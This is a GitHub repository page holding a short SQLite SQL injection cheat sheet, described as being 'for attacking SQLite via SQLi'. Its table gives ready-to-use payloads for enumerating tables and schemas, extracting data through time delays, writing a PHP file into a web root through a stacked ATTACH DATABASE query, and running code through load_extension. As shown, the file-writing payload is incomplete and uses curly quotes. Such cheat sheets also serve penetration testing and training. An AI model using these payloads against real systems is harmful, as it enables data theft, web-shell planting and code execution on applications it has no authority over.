Skip to content

unicornsasfuel/sqlite_sqli_cheat_sheet

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits

README.md

README.md

 
 

Repository files navigation

SQLite SQL Injection Cheat Sheet

If you need You use
Concatenation ||
Comments --
Conditionals CASE WHEN key='value1' THEN 'something' WHEN key='value2' THEN 'somethingelse'
Substring substr(string,start,stop)
Length length(string)
Quotes without literal quotes cast(X'27' as text) --use X'22' for double quotes
Table name enumeration SELECT name FROM sqlite_master WHERE type='table'
Table schema enumeration SELECT sql FROM sqlite_master WHERE type='table'
Time-based data extraction cond='true' AND 1=randomblob(100000000) --causes time delay if cond='true'
File writing 1';ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘’;-- --requires either direct database access or (non-default) stacked query option enabled
Arbitrary Code Execution load_extension(library_file,entry_point) -- .dll for Windows, .so for 'nix. Requires non-default configuration

This work is based on http://atta.cked.me/home/sqlite3injectioncheatsheet

About

A cheat sheet for attacking SQLite via SQLi

Resources

Readme
Activity

Stars

90 stars

Watchers

4 watching

Forks

16 forks
Report repository

Releases

No releases published

Packages

No packages published